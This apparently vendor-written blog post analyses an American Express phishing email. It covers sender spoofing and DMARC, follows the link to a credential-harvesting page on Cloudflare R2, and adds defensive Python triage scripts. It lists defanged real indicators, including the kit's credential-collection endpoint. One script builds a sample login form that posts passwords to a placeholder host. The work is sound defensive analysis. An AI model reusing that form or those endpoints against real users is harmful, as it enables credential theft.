
Unveiling American Express Phishing Scams: MerkleFence Analysis Insights: Part 1

Phishing emails have been a persistent threat for a long time. Although the rate of successful phishing attacks has declined slightly thanks to user education, better defences, and the use of AI and ML in threat detection and prevention, email remains one of the most common ways phishing is delivered. It is estimated that 91% of all cyber attacks begin with a phishing email, and in 2023 credential phishing was the most common type, with a 67% increase in volume compared to 2022.

Over the past few days, we have been conducting research and gathering threat intelligence from a phishing email forwarded to us by one of our clients. In this expository post, we aim to uncover as much information as possible about the threat actor. This will be part 1 of our findings.

The Email

Screen capture of the phishing email

There are several red flags in this email. The first one is the email subject.

The subject has an urgent tone and claims to come from a well-known financial institution, American Express. The body demands immediate action on a supposed security issue: recovering a password that was allegedly reset after a ‘rush call’ from an unknown number. The email also contains a suspicious link and a generic greeting rather than the recipient’s name.

The Investigation

Identifying the sender

The first step was to identify who sent the email. We used WHOIS and IP lookups to trace the sender’s origin. The From header showed the message as coming from [email protected] rather than from an American Express domain (the From header is set by the sender and proves nothing by itself, which is why the next step looks at whether the claimed domain can be spoofed).

Research into the secure.net domain revealed that it has been reported by several users for phishing emails.

This suggests that the sender spoofed the secure.net domain rather than sending from a genuine secure.net mailbox, which is made easier by the fact that secure.net lacks the email authentication needed to prevent it. The critical anti-spoofing control is a DMARC policy: without an enforcing policy (p=quarantine or p=reject), criminals can send email that claims to come from secure.net and receiving servers have no instruction to reject it. DMARC builds on SPF and DKIM, so all three should be deployed together.
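As an added example, not code from MerkleFence’s original analysis, the Python script below shows the two checks behind this section: triaging a message’s headers for a mismatch between the visible From domain and the envelope sender, together with the receiver’s Authentication-Results verdicts, and assessing whether a domain’s published SPF and DMARC records would actually stop From-header spoofing. The message and DNS records are constructed placeholders (secure.example, mail.example.net), not the real email or secure.net’s records.

```python
import re
from email import message_from_string, policy
from email.utils import parseaddr

# Constructed sample message (placeholder domains), shaped like the phishing
# email above: the visible From: domain differs from the envelope sender, and
# the receiving server recorded spf=pass but dmarc=none.
RAW_MESSAGE = """\
Return-Path: <bounce@mail.example.net>
Received: from mta.example.net (mta.example.net [203.0.113.10])
\tby mx.victim.example (Postfix) with ESMTPS id 4ABC123
\tfor <user@victim.example>; Mon, 1 Jan 2024 10:00:00 +0000
Authentication-Results: mx.victim.example;
\tspf=pass smtp.mailfrom=mail.example.net;
\tdkim=none;
\tdmarc=none header.from=secure.example
From: "American Express" <alerts@secure.example>
To: user@victim.example
Subject: Urgent: your password was reset

Please sign in to restore access.
"""

AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=([a-z]+)", re.I)
RECEIVED_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
SPF_QUALIFIERS = {"-": "fail", "~": "softfail", "?": "neutral", "+": "pass"}


def domain_of(address_header):
    """Domain part of a header like '"Name" <user@host>', lower-cased."""
    _, addr = parseaddr(address_header)
    return addr.rpartition("@")[2].lower()


def parse_auth_results(value):
    """Pull the spf=/dkim=/dmarc= verdicts out of an Authentication-Results header."""
    return {k.lower(): v.lower() for k, v in AUTH_RE.findall(value)}


def triage_headers(raw):
    msg = message_from_string(raw, policy=policy.default)
    from_domain = domain_of(str(msg.get("From", "")))
    return_path_domain = domain_of(str(msg.get("Return-Path", "")))
    # Each hop prepends a Received header, so the last one is the earliest hop
    # and carries the IP closest to the real sender.
    origin_ip = None
    for hop in reversed([str(h) for h in msg.get_all("Received", [])]):
        m = RECEIVED_IP_RE.search(hop)
        if m:
            origin_ip = m.group(1)
            break
    return {
        "from_domain": from_domain,
        "return_path_domain": return_path_domain,
        # Strict comparison; DMARC's default relaxed mode also accepts subdomains.
        "aligned": from_domain == return_path_domain,
        "origin_ip": origin_ip,
        "auth": parse_auth_results(str(msg.get("Authentication-Results", ""))),
    }


def parse_dmarc(txt):
    """Split a _dmarc.<domain> TXT record into tag=value pairs; {} if not DMARC."""
    if not txt.strip().lower().startswith("v=dmarc1"):
        return {}
    tags = {}
    for part in txt.split(";"):
        key, sep, val = part.partition("=")
        if sep:
            tags[key.strip().lower()] = val.strip()
    return tags


def dmarc_enforced(txt):
    """True only if receivers are told to quarantine/reject 100% of failures."""
    tags = parse_dmarc(txt)
    policy_tag = tags.get("p", "none").lower()
    return policy_tag in ("quarantine", "reject") and int(tags.get("pct", "100")) == 100


def spf_default_result(txt):
    """SPF verdict for a sender not listed in the record: the qualifier on 'all'."""
    if not txt.strip().lower().startswith("v=spf1"):
        return None
    for token in txt.split()[1:]:
        m = re.fullmatch(r"([-~?+]?)all", token, re.I)
        if m:
            return SPF_QUALIFIERS[m.group(1) or "+"]
    return "neutral"  # record has no 'all' mechanism at all


def spoofing_posture(spf_txt, dmarc_txt):
    """Can a third party put this domain in From: and still get delivered?"""
    tags = parse_dmarc(dmarc_txt)
    return {
        "spf_default": spf_default_result(spf_txt),
        "dmarc_policy": tags.get("p", "none").lower() if tags else None,
        # SPF only checks the envelope sender; without an enforcing DMARC policy
        # nothing tells receivers to act on a spoofed visible From: domain.
        "from_spoofable": not dmarc_enforced(dmarc_txt),
    }


if __name__ == "__main__":
    print(triage_headers(RAW_MESSAGE))
    # Constructed records standing in for what a domain like secure.net might publish.
    print(spoofing_posture("v=spf1 include:_spf.example.net ~all",
                           "v=DMARC1; p=none; rua=mailto:dmarc@secure.example"))
```

To assess a live domain, fetch its records with `dig +short TXT _dmarc.secure.net` and `dig +short TXT secure.net` and pass the returned strings to `spoofing_posture`. A `p=none` record is monitoring only: it yields reports but does not stop a spoofed message from being delivered.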

Analysing links

We submitted the suspicious link from the email, hxxp[://]t[.]co/L4Ac5oXbSx, to VirusTotal to check whether it was already known to be malicious. The link goes through t.co, X/Twitter’s URL shortener, which hides the real destination from the recipient.

Three security vendors labelled this URL as malicious, specifically as phishing. We then opened the link in a sandbox environment to follow it safely and found that it redirects to a fake login page designed to harvest credentials:

hxxps[://]pub-80848fef826d408b8554076b7c527c58[.]r2[.]dev/blobexpexp[.]HTML

Analyzing this final site using VirusTotal reveals that 14 security vendors flag it as malicious, with most of them identifying it as a phishing threat.

To further enhance our analysis, we employed urlscan.io, which indicated that the site was potentially malicious for targeting American Express, a financial institution.

The .r2.dev domain name indicates that the site is hosted on Cloudflare R2, “a new cloud storage service that allows developers to store large amounts of unstructured data without the costly egress bandwidth fees associated with typical cloud storage services.” As is often the case with new, cheap hosting, these public buckets are now being abused in phishing attacks and turn up in the URLs of phishing emails. The standard URL structure is https://pub-{32 Hexadecimal String}.r2.dev/. Malwarebytes has recently started blocking such URLs because of their association with riskware and phishing, and a post on the Cloudflare community forum asks how to report this abuse. The hostname alone is not proof of malice, since legitimate projects also serve content from public R2 buckets; what matters is the combination with a brand-impersonating login page, and a report should go to Cloudflare’s abuse process since the bucket owner cannot be identified from the URL.
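As an added example, not code from the original post, the script below pulls URLs out of an email body in either defanged (hxxp[://], [.]) or live form, flags hostnames that match the pub-{32 hex}.r2.dev pattern described above, and computes the identifier VirusTotal’s v3 API uses to look up a URL (URL-safe base64 without padding), so a hit can be checked without pasting the live link into a browser. The sample body is constructed; the two defanged URLs in it are the ones quoted in this post. The R2 match is a triage signal, not a verdict.

```python
import base64
import re

# Constructed sample body (not the real email) containing the two defanged
# URLs quoted in this post plus one ordinary link.
SAMPLE_BODY = """\
Your password was reset after a rush call from an unknown number.
Review the activity here: hxxp[://]t[.]co/L4Ac5oXbSx
(the shortener forwards to hxxps[://]pub-80848fef826d408b8554076b7c527c58[.]r2[.]dev/blobexpexp[.]HTML)
Questions? See https://www.example.com/help
"""

# Matches both live (http://) and defanged (hxxp[://]) URLs in free text.
URL_RE = re.compile(r"\b(?:hxxps?|https?)(?:\[://\]|://)[^\s<>\"']+", re.I)
# Public R2 bucket hostname: 'pub-' followed by 32 hex characters under r2.dev,
# and nothing else after r2.dev except the path (rejects r2.dev.evil.example).
R2_PUBLIC_RE = re.compile(r"^https?://pub-[0-9a-f]{32}\.r2\.dev(?:/|$)", re.I)


def refang(url):
    """hxxp[://]t[.]co/x -> http://t.co/x (also tolerates already-live URLs)."""
    url = re.sub(r"^hxxp", "http", url, flags=re.I)
    return url.replace("[://]", "://").replace("[.]", ".").replace("[:]", ":")


def defang(url):
    """http://t.co/x -> hxxp[://]t[.]co/x so the IOC is safe to paste in a report."""
    url = re.sub(r"^http", "hxxp", url, flags=re.I)
    return url.replace("://", "[://]").replace(".", "[.]")


def is_r2_public_bucket(url):
    return R2_PUBLIC_RE.match(refang(url)) is not None


def vt_url_id(url):
    """VirusTotal API v3 URL identifier: URL-safe base64 of the URL, padding stripped."""
    return base64.urlsafe_b64encode(url.encode()).decode().rstrip("=")


def extract_urls(text):
    # Trailing punctuation from the surrounding sentence is not part of the URL.
    return [m.group(0).rstrip(".,;:)") for m in URL_RE.finditer(text)]


def triage_urls(text):
    rows = []
    for raw in extract_urls(text):
        url = refang(raw)
        rows.append({
            "url": url,
            "defanged": defang(url),
            "r2_public_bucket": is_r2_public_bucket(url),
            "vt_id": vt_url_id(url),
        })
    return rows


if __name__ == "__main__":
    for row in triage_urls(SAMPLE_BODY):
        print(row)
```

With an API key, the `vt_id` value is the path component for `GET https://www.virustotal.com/api/v3/urls/{vt_id}`; keep the defanged form for reports and tickets so nobody clicks it by accident.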

Reviewing the page source showed that the phishing page’s actual content was base64-encoded, so the login form is not visible in the raw HTML.

Decoding it showed that the harvested credentials were to be sent to hxxps[://]kpossa[.]sa[.]com/cgi-bin/america/send[.]php
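As an added example rather than the actual phishing page, the following Python script automates the step just described: it finds long base64 runs in a page’s HTML, decodes the ones that yield text, repeats on the decoded layers in case the encoding is nested, and reports every form action and absolute URL it finds, which is where a credential-harvesting endpoint usually surfaces. The sample page is constructed inline with a placeholder collector URL (collector.example); it is not the real kit.

```python
import base64
import binascii
import re

B64_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")   # long base64-looking runs only
URL_RE = re.compile(r"https?://[^\s\"'<>()]+")
ACTION_RE = re.compile(r"<form\b[^>]*\baction\s*=\s*[\"']([^\"']+)[\"']", re.I)

# Constructed sample: a decoy page that writes a base64-encoded login form at
# runtime, so grepping the raw HTML never shows the form or its action URL.
# collector.example is a placeholder, not the real kit's endpoint.
INNER_FORM = (
    '<form action="https://collector.example/cgi-bin/send.php" method="POST">'
    '<input name="user"><input name="pass" type="password">'
    '<button>Log In</button></form>'
)
SAMPLE_PAGE = (
    '<html><body><img src="https://cdn.example.net/logo.png">'
    '<script>document.write(atob("'
    + base64.b64encode(INNER_FORM.encode()).decode()
    + '"))</script></body></html>'
)


def decode_b64_text(blob):
    """Decode a base64 run if it yields (mostly) printable UTF-8 text, else None."""
    padded = blob + "=" * (-len(blob) % 4)   # tolerate stripped padding
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    printable = sum(1 for c in text if c.isprintable() or c in "\r\n\t")
    return text if text and printable >= 0.95 * len(text) else None


def extract_endpoints(html):
    """Form actions and absolute URLs visible in one layer of markup."""
    return {
        "form_actions": sorted(set(ACTION_RE.findall(html))),
        "urls": sorted(set(URL_RE.findall(html))),
    }


def analyse_page(html, max_depth=4):
    """Peel base64 layers (atob(), data: URIs, nested encodings) and collect
    endpoints from every layer; the exfil URL is usually in the innermost one."""
    layers, frontier = [html], [html]
    for _ in range(max_depth):
        decoded = []
        for layer in frontier:
            for blob in B64_RE.findall(layer):
                text = decode_b64_text(blob)
                if text:
                    decoded.append(text)
        if not decoded:
            break
        layers.extend(decoded)
        frontier = decoded
    actions, urls = set(), set()
    for layer in layers:
        found = extract_endpoints(layer)
        actions.update(found["form_actions"])
        urls.update(found["urls"])
    return {"layers": len(layers), "form_actions": sorted(actions), "urls": sorted(urls)}


if __name__ == "__main__":
    print("form actions visible in raw HTML:", extract_endpoints(SAMPLE_PAGE)["form_actions"])
    print("after decoding:", analyse_page(SAMPLE_PAGE))
```

Run it against the saved HTML of a suspect page (never a live fetch from an analyst workstation) and treat any form action or POST target outside the impersonated brand’s domains as the exfiltration endpoint to block and report.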

Not much information is available on hxxps[://]kpossa[.]sa[.]com/cgi-bin/america/send[.]php other than that the domain is attributed to Newold Digital Inc., a US-based web presence provider offering domains, online marketing, and hosting. That points to the hosting or registration provider rather than to whoever operates the phishing kit.

Preliminary Conclusion

Our preliminary investigations have led us to conclude that the email was a credential harvesting attempt aimed at stealing login credentials for financial accounts from unsuspecting users. If successful, it could have resulted in significant economic loss and identity theft.

In part 2 of our research, we will strive to determine the scope of the phishing campaigns, identify potential victims, and outline actions organizations can take to safeguard themselves.

To safeguard yourself and your company against phishing attacks, it’s crucial to educate all employees about the indicators of phishing and establish a transparent reporting process for such attempts. Additionally, it’s imperative to ensure that your company implements email security measures to prevent your domain from being spoofed and used to distribute phishing emails. Protect your organization from phishing threats with MerkleFence. Talk to Us.